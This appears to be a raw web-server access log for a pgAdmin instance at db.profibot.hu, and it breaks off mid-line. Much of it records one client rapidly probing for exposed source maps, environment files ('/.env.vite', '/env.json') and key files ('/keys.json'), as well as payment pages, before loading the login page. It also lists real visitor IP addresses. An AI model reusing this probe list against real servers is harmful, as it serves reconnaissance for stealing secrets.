"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/config/index.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/dist/bundle.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/index.html" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_next/static/chunks/commons.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/public/build/entry.client.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/manifest.json" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/build/static/js/main.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_next/static/chunks/pages/_app.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/webpack.runtime.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_next/static/chunks/main.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/main.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/astro.config.mjs" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/public/js/main.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/vite.config.ts" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/build/index.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/payment" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/public/build/manifest.json" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/static/js/bundle.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/config.json" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/src/config.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/__ENV.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/assets/vendor.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/dist/app.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/build/qwik-loader.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/js/main.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/.env.vite" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_app/immutable/entry/app.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/assets/main.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/assets/js/app.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/static/js/5.chunk.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/build/main.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 216.81.245.209] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/workbox.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/svelte.config.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/build/root.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/js/app.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_nuxt/vendors.app.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/runtime.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/app/root.tsx" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/public/js/bundle.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/service-worker.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/dist/.vite/manifest.json" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/env.json" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_next/static/chunks/_ssgManifest.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/build/q-manifest.json" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/stripe.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/payment.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/dist/main.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/build/bundle.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/build/static/js/bundle.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/public/js/app.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/static/js/app.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/app.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/js/main.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/js/config.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/vendor.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/dist/bundle.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/static/js/main.chunk.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_next/static/chunks/pages/_app.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_next/static/chunks/pages/index.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_next/static/development/pages/_app.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_nuxt/app.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/static/js/main.chunk.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/static/js/2.chunk.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/static/js/runtime-main.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/config/keys.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/keys.json" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/lib/config.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/cart" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/api/config.json" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/checkout" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/subscribe" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/api/settings" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/api/v1/config" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/__config.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_next/static/chunks/1.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/@vite/env" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/.vite/deps/_metadata.json" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_app/env.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/@vite/client" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_app/immutable/entry/start.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/app/entry.client.tsx" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/dist/client.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/page-data/app-data.json" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_astro/hoisted.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/dist/solid.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 216.81.245.209] [Length 2390] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "https://db.profibot.hu/" +[20/Jan/2026:17:21:49 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/pgadmin_commons.js?ver=91100" [Client 216.81.245.209] [Length 5643] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:49 +0000] - 200 200 - GET https db.profibot.hu "/static/vendor/require/require.min.js?ver=91100" [Client 216.81.245.209] [Length 6762] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:49 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.main.js?ver=91100" [Client 216.81.245.209] [Length 359559] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:49 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.sqleditor.js?ver=91100" [Client 216.81.245.209] [Length 97409] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:49 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.react.js?ver=91100" [Client 216.81.245.209] [Length 162950] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:49 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.others.js?ver=91100" [Client 216.81.245.209] [Length 195715] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:21:42:35 +0000] - - 502 - GET https db.profibot.hu "/" [Client 204.76.203.25] [Length 556] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[22/Jan/2026:08:23:20 +0000] - - 301 - GET http db.profibot.hu "/" [Client 72.11.155.223] [Length 166] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "-" +[22/Jan/2026:08:23:21 +0000] - - 502 - GET https db.profibot.hu "/" [Client 72.11.155.223] [Length 154] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "http://db.profibot.hu/" +[22/Jan/2026:10:52:55 +0000] - - 502 - GET https db.profibot.hu "/" [Client 84.1.26.27] [Length 556] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[22/Jan/2026:10:52:55 +0000] - - 502 - GET https db.profibot.hu "/favicon.ico" [Client 84.1.26.27] [Length 556] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/" +[22/Jan/2026:10:53:19 +0000] - - 502 - GET https db.profibot.hu "/" [Client 84.1.26.27] [Length 556] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[22/Jan/2026:10:53:19 +0000] - - 502 - GET https db.profibot.hu "/favicon.ico" [Client 84.1.26.27] [Length 556] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/" +[22/Jan/2026:11:11:58 +0000] - - 502 - GET https db.profibot.hu "/" [Client 37.76.14.132] [Length 556] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:11:11:59 +0000] - - 502 - GET https db.profibot.hu "/" [Client 37.76.14.132] [Length 556] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:11:12:00 +0000] - - 502 - GET https db.profibot.hu "/favicon.ico" [Client 37.76.14.132] [Length 556] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/" +[22/Jan/2026:11:12:01 +0000] - - 502 - GET https db.profibot.hu "/" [Client 66.249.81.37] [Length 556] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[22/Jan/2026:11:12:01 +0000] - - 502 - GET https db.profibot.hu "/" [Client 66.249.81.36] [Length 556] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[22/Jan/2026:11:12:01 +0000] - - 502 - GET https db.profibot.hu "/" [Client 66.102.8.225] [Length 556] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[22/Jan/2026:11:12:08 +0000] - - 502 - GET https db.profibot.hu "/favicon.ico" [Client 37.76.14.132] [Length 556] [Gzip -] [Sent-to 